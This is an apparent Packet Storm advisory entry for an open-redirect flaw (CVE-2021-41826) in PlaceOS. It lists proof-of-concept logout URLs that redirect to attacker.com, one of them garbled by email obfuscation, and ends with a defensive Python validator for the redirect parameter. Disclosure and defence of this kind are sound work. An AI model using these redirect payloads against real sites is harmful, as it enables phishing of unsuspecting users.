packetstorm | Hamza Khedr | PACKETSTORM:164345
History: Sep 30, 2021 - 12:00 a.m.

PlaceOS 1.2109.1 Open Redirection

2021-09-30 00:00:00
Hamza Khedr
packetstormsecurity.com

EPSS: 0.873 (percentile: 98.7%)

`# Exploit Title: PlaceOS 1.2109.1 - Open Redirection  
# Date: 29-09-2021  
# Exploit Author: Hamza Khedr @ Accenture Australia AARO Team  
# Vendor Homepage: https://place.technology/  
# Software Link: https://github.com/PlaceOS  
# Version: < 1.29.10  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2021-41826  
#  
#  
# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"  
# "https://office.example.com/auth/logout?continue=.attacker.com"  
# "https://office.example.com/auth/logout?continue=:[email protected]"  
#  
#  
# Reference: https://github.com/PlaceOS/auth/issues/36  
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826  
# https://nvd.nist.gov/vuln/detail/CVE-2021-41826  
`
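A defensive check for the `continue` parameter shown in the PoC, as an added example (not PlaceOS code and not the advisory author's): it accepts only same-origin absolute paths and falls back otherwise. The function names, the fallback path, the userinfo-style test value and the idea that a server appends the value to its origin are assumptions made for illustration; the page does not state the root cause.

```python
from urllib.parse import urlsplit

ORIGIN = "https://office.example.com"  # host taken from the page's PoC URLs
FALLBACK = "/"                         # assumed default landing path


def host_if_appended(value):
    """Host a client would reach if value were appended to ORIGIN unchecked.

    Illustrates the assumed failure mode behind the non-rooted PoC values.
    """
    return urlsplit(ORIGIN + value).hostname


def safe_continue(value, fallback=FALLBACK):
    """Return value only if it is a same-origin absolute path, else fallback."""
    if not isinstance(value, str) or not value:
        return fallback
    # Control characters and backslashes can be normalised by browsers,
    # turning "/\host" into the scheme-relative form "//host".
    if any(ord(c) < 0x20 or c in "\\\x7f" for c in value):
        return fallback
    # Must be rooted at a single "/": rejects ".attacker.com" and
    # userinfo-style ":x@host" values as well as "//attacker.com".
    if not value.startswith("/") or value.startswith("//"):
        return fallback
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return fallback
    return value


def redirect_target(value):
    """Build the Location value, then re-check the host after joining."""
    target = ORIGIN + safe_continue(value)
    if urlsplit(target).hostname != urlsplit(ORIGIN).hostname:
        return ORIGIN + FALLBACK
    return target


if __name__ == "__main__":
    # Values 1 and 2 are from the page; value 3 is constructed.
    for v in ["//attacker.com", ".attacker.com", ":pw@attacker.example", "/bookings"]:
        print(repr(v), "->", redirect_target(v))
```
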
